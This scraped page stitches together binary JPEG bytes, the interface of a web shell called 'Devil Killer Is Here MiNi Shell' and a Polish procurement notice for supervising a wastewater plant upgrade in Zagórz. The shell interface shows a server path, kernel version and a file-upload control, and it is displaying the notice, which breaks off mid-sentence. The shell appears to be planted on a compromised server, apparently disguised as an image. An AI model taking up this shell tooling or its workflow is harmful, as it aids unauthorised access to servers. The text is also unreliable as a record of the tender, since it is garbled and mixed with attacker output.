JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240325/0025825501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przebudowa i rozbudowa oczyszczalni ścieków w Zagórzu wraz z przyłączem energetycznym – zadanie 4 Nadzór inwestorski. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD USŁUG TECHNICZNYCH SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370269712</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bieszczadzka 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zagórz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-540</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zut.biuro@zut.zagorz.net</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zut.zagorz.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Ochrona środowiska - oczyszczalnia ścieków </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa i rozbudowa oczyszczalni ścieków w Zagórzu wraz z przyłączem energetycznym – zadanie 4 Nadzór inwestorski. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-506f7bca-e838-11ee-9c02-ce2b643d361d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00258255</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00105270/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Przebudowa i rozbudowa oczyszczalni ścieków w Zagórzu wraz z przyłączem energetycznym. - zadanie 3 Nadzór inwestorski</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> FEPK.02 Energia i Środowisko, działanie FEPK.02.06 Zrównoważona gospodarka wodno-ściekowa </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-506f7bca-e838-11ee-9c02-ce2b643d361d <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344). <br/>Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:<br/>1)	poprzez Platformę E-Zamówienia i „Formularz do komunikacji użytk. jako Wykonawca”, dostępny na stronie postępowania tj. https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-506f7bca-e838-11ee-9c02-ce2b643d361d „Komunikacja w postępowaniu” -&gt; „Formularz do komunikacji”,<br/>2)	lub WYŁĄCZNIE w sytuacjach AWARYJNYCH: na adres mailowy zut.biuro@zut.zagorz.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozdziale VII ust. 1 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Państwa danych osobowych w rozumieniu Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 5/46/WE („RODO”) jest ZAKŁAD USŁUG TECHNICZNYCH sp. z o.o. w Zagórzu, ul. Bieszczadzka 5, 38-540 Zagórz, NIP: 687-10-04-553, e-mail: zut.biuro@zut.zagorz.net<br/>2. W sprawach związanych z Państwa danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych, wysyłając e-mail na adres: inspektorsds@gmail.com<br/>3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu związanym z prowadzeniem postępowania o udzielenie zamówienia publicznego pod nazwą Przebudowa i rozbudowa oczyszczalni ścieków w Zagórzu wraz z przyłączem energetycznym – zadanie 4 Nadzór inwestorski – znak sprawy: ZP 3/OS/2024 oraz jego rozstrzygnięciem, jak również zawarciem umowy w sprawie zamówienia publicznego, a także udokumentowaniem postępowania o udzielenie zamówienia publicznego i jego archiwizacją.<br/>4. Odbiorcami Państwa danych osobowych będą:<br/>•	osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (tj. Dz. U. z 2023 r., poz. 1605 ze zm.), dalej „ustawa Pzp”, <br/>•	podmioty świadczące na rzecz Administratora usługi prawne, informatyczne, hostingowe, księgowo-finansowe, kurierskie i pocztowe oraz inne, z którymi Administrator zawrze umowy powierzenia przetwarzania danych osobowych, a także właściciel platformy zakupowej, na której Administrator prowadzi postępowania o udzielenia zamówienia publicznego i jego podwykonawcy. <br/>5. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy Pzp, przez okres 4 lat od dnia zakończenia postepowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Państwa dane osobowe mogą być jednak przechowywane dłużej ze względu na realizację innych zadań wynikających z działań Administratora. W przypadku prowadzenia postępowań na roboty budowlane lub usługi – okres przechowywania dokumentacji postępowania wynosi 5 lat od dnia zakończenia postępowania o zawarcie umowy koncesji, a w przypadku gdy czas trwania umowy koncesji przekracza 5 lat – przez okres jego trwania. <br/>6. Obowiązek podania przez Państwa danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp. <br/>7. Mając na uwadze powyższe przysługuje Państwu prawo do: <br/>•	na podstawie art. 15 RODO prawo dostępu do Państwa danych osobowych dotyczących;<br/>•	na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Państwa danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu postępowania oraz jego załączników;<br/>•	na podstawie art. 18 RODO prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>•	prawo do wniesienia skargi do Prezesa UODO, gdy uznają Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8. Nie przysługuje Państwu:<br/>•	w związku z art. 17 ust. 3 lit. b), d) lub e) RODO prawo do usunięcia danych osobowych; <br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c) RODO.<br/>9. W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO. <br/>10. Administrator nie zamierza przekazywać Państwa danych osobowych do państw trzecich lub organizacji międzynarodowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">3/OS/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest nadzór inwestorski dla zadania, którego zakresem jest przebudowa i rozbudowa oczyszczalni ścieków w Zagórzu wraz z przyłączem energetycznym m.in. wraz z instalacjami wewnętrznymi (wodociągową, kanalizacyjną, gazową, centralnego ogrzewania, wentylacji mechanicznej, klimatyzacji, elektryczną, teletechniczną) oraz przyłączami: wody, kanalizacji sanitarnej, kanalizacji deszczowej, gazu, energii elektrycznej, instalacji teletechnicznej, zewnętrzną instalacją oświetleniową.<br/>Przedmiot zamówienia obejmuje: <br/>1.	reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem i pozwoleniem na budowę, przepisami oraz zasadami wiedzy technicznej; <br/>2.	sprawdzanie jakości wykonywanych robót budowlanych i stosowania przy wykonywaniu tych robót wyrobów zgodnie z art. 10 Prawa budowlanego (tj. Dz. U. z 2023 r., poz. 682 ze zm.).<br/>3.	sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych i przewodów kominowych oraz przygotowanie i udział w czynnościach odbioru gotowych obiektów budowlanych i przekazywanie ich do użytkowania; <br/>4.	potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także kontrolowanie rozliczeń budowy.<br/><br/>UWAGA! Wykonawca, w okresie realizacji zamówienia, musi posiadać ubezpieczenie – w zakresie odpowiedzialności cywilnej w związku z wykonywaną działalnością (za wszelkie szkody wyrządzone osobom trzecim, w tym Zamawiającemu, na osobie lub w mieniu, w tym za utratę lub zniszczenie lub uszkodzenia mienia lub inny uszczerbek majątkowy, odpowiedzialność za uszkodzenia ciała lub wywołanie rozstroju zdrowia lub śmierć) – obejmujące obowiązek wypłaty odszkodowania za szkodę będącą następstwem zdarzeń (działań lub zaniechań) zaistniałych w związku z wykonywaniem zamówienia na kwotę ubezpieczenia nie niższą niż 500 000,00 zł (słownie: pięćset tysięcy złotych 00/100 groszy) na jedno lub wszystkie zdarzenia.<br/>Wykonawca zobowiązuje się doręczyć Zamawiającemu – w terminie 5 dni od zawarcia umowy - jednak nie później niż przed rozpoczęciem realizacji umowy – wszystkie dokumenty potwierdzające zawarcie i ważność umowy ubezpieczenia oraz zakres ochrony ubezpieczeniowej. W przypadku zbliżania się końca okresu ubezpieczenia, Wykonawca ma obowiązek doręczyć dokumenty potwierdzające zawarcie i ważność nowej umowy ubezpieczenia oraz zakres ochrony ubezpieczeniowej najpóźniej w ostatnim dniu ważności poprzedniego ubezpieczenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny i wyboru ofert i ich znaczenie:<br/>1) K1: Cena – znaczenie w ocenie 60%. <br/>2) K2: Doświadczenie inspektora nadzoru inwestorskiego specjalności konstrukcyjno-budowlanej – znaczenie w ocenie 20%.<br/>3) K3: Doświadczenie inspektora nadzoru inwestorskiego specjalności instalacyjnej (branży sanitarnej) – znaczenie w ocenie 20%.<br/><br/>Ad. 1) Kryterium: Cena - znaczenie w ocenie 60%<br/><br/>Najniższa cena spośród ofert niepodlegających odrzuceniu/Cena badanej oferty brutto X 60 % x 100 = …… pkt<br/><br/>Ad. 2) Kryterium: Doświadczenie inspektora nadzoru inwestorskiego specjalności konstrukcyjno-budowlanej - znaczenie w ocenie 20%.<br/><br/>Doświadczenie inspektora nadzoru inwestorskiego specjalności konstrukcyjno-budowlanej - wymagane jest posiadanie przez 1 osobę: <br/>- uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń <br/>- minimalne doświadczenie na stanowisku inspektora nadzoru wykonanych robót budowlanych tj. co najmniej 1 (słownie: jedna) robota budowlana polegająca na budowie/rozbudowie/przebudowie/modernizacji oczyszczalni ścieków o wartości nadzorowanych robót co najmniej 5.000.000,00 zł brutto zrealizowana w okresie ostatnich trzech lat przed upływem terminu składania ofert. <br/><br/>W przypadku, gdy dana osoba skierowana do realizacji zamówienia, będzie posiadać większe doświadczenie, oferta otrzyma dodatkowe punkty. Punkty będą przyznane w następujący sposób: <br/>- sprawowanie nadzoru nad wykonaniem 1 roboty budowlanej o zakresie i wartości j/w – oferta otrzyma 0 pkt. <br/>- sprawowanie nadzoru nad wykonaniem 2 robót budowlanych o zakresie i wartości j/w – oferta otrzyma 5 pkt. <br/>- sprawowanie nadzoru nad wykonaniem 3 robót budowlanych o zakresie i wartości j/w – oferta otrzyma 10 pkt. <br/>- sprawowanie nadzoru nad wykonaniem 4 robót budowlanych o zakresie i wartości j/w. – oferta otrzyma 15 pkt. <br/>- sprawowanie nadzoru nad wykonaniem 5 robót budowlanych i więcej o zakresie i wartości j/w – oferta otrzyma 20 pkt.<br/><br/>Ad.3) Kryterium: Doświadczenie inspektora nadzoru inwestorskiego specjalności instalacyjnej (branży sanitarnej) - znaczenie w ocenie 20%.<br/> <br/>Doświadczenie inspektora nadzoru inwestorskiego specjalności instalacyjnej (branży sanitarnej) - wymagane jest posiadanie przez 1 osobę: <br/>- uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami budowlanymi w specjalności instalacyjnej (branży sanitarnej) w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń (lub odpowiadające im ważne uprawnienia wydane na podstawie obowiązujących wcześniej przepisów). <br/>- doświadczenie na stanowisku inspektora nadzoru wykonanych robót budowlanych tj. co najmniej 1 (słownie: jedna) robota budowlana polegająca na budowie/rozbudowie/przebudowie/modernizacji oczyszczalni ścieków o przepustowości co najmniej Qdś=1600m3/d oraz wartości nadzorowanych robót co najmniej 5.000.000,00 zł brutto zrealizowana w okresie ostatnich trzech lat przed upływem terminu składania ofert. <br/>W przypadku, gdy dana osoba skierowana do realizacji zamówienia, będzie posiadać większe doświadczenie, oferta otrzyma dodatkowe punkty. Punkty będą przyznane w następujący sposób: <br/>- sprawowanie nadzoru nad wykonaniem 1 roboty budowlanej o zakresie i wartości j/w – oferta otrzyma 0 pkt. <br/>- sprawowanie nadzoru nad wykonaniem 2 robót budowlanych o zakresie i wartości j/w – oferta otrzyma 5 pkt. <br/>- sprawowanie nadzoru nad wykonaniem 3 robót budowlanych o zakresie i wartości j/w – oferta otrzyma 10 pkt. <br/>- sprawowanie nadzoru nad wykonaniem 4 robót budowlanych o zakresie i wartości j/w. – oferta otrzyma 15 pkt. <br/>- sprawowanie nadzoru nad wykonaniem 5 robót budowlanych i więcej o zakresie i wartości j/w – oferta otrzyma 20 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie inspektora nadzoru inwestorskiego specjalności konstrukcyjno-budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie inspektora nadzoru inwestorskiego specjalności instalacyjnej (branży sanitarnej)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W niniejszym postępowaniu Zamawiający określa następujące warunki udziału w postępowaniu, w zakresie: <br/>- zdolności technicznej lub zawodowej.<br/>Zamawiający określa następujący warunek udziału w postępowaniu w tej kategorii: <br/>Zamawiający żąda od Wykonawcy wskazania osób, które będą uczestniczyć w wykonywaniu zamówienia (osób skierowanych do realizacji zamówienia), posiadających stosowne kwalifikacje zawodowe i doświadczenie odpowiednie do pełnionej funkcji, jakie mają zostać im powierzone. Wykonawca na każdą funkcję wymienioną poniżej, wskaże w ofercie osoby co najmniej 1 osobę, posiadającą określone poniżej uprawnienia.<br/>Zamawiający uzna, że warunek ten jest spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował osobami: <br/>a)	inspektor nadzoru inwestorskiego branży konstrukcyjno-budowlanej: co najmniej 1 (słownie: jedna) osoba o następujących kwalifikacjach (łącznie): <br/>-	uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie tj. do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń (lub odpowiadające im ważne uprawnienia wydane na podstawie obowiązujących wcześniej przepisów). W przypadku wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do wymaganych zdobyte w innych państwach, uznane w myśl art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2023 r., poz. 682 ze zm.). <br/>-	doświadczenie na stanowisku inspektora nadzoru wykonanych robót budowlanych lub kierownika budowy lub kierownika robót budowlanych tj. co najmniej 1 (słownie: jedna) robota 